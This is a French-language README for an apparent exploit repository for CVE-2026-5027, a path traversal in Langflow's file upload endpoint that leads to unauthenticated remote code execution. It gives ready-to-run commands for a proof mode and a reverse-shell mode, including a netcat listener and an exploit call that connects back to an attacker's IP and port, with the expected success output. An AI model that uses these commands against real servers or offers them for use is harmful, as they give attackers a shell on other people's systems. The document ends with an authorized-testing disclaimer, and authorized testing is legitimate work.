
CVE-2026-5027
Écriture Arbitraire de Fichier menant à une RCE
Exécution de Code à Distance non authentifiée via Téléchargement de Fichier
Langflow souffre d'une vulnérabilité critique de traversée de chemin dans le point de terminaison de téléchargement de fichier (POST /api/v2/files).
Un attaquant peut envoyer un nom de fichier malveillant contenant des séquences ../ pour écrire des fichiers arbitraires n'importe où sur le système de fichiers du serveur.
Cela mène facilement à une exécution de code à distance complète (RCE) — par exemple en déposant une webshell ou en injectant dans crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Sortie attendue si vulnérable:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Démarrer l'écouteur
nc -lvnp 4444
# Exécuter l'exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| Fichier | Description |
|---|---|
CVE-2026-5027.py | Exploit principal en Python (PoC + RCE) |
CVE-2026-5027.yaml | Modèle Nuclei pour le scan |
README.md | Ce fichier |
Mode Preuve
python3 CVE-2026-5027.py -t http://target.com/ --proof
Mode Shell Inversé
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Ce dépôt est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de tester.
Fait avec ❤️ pour la communauté red team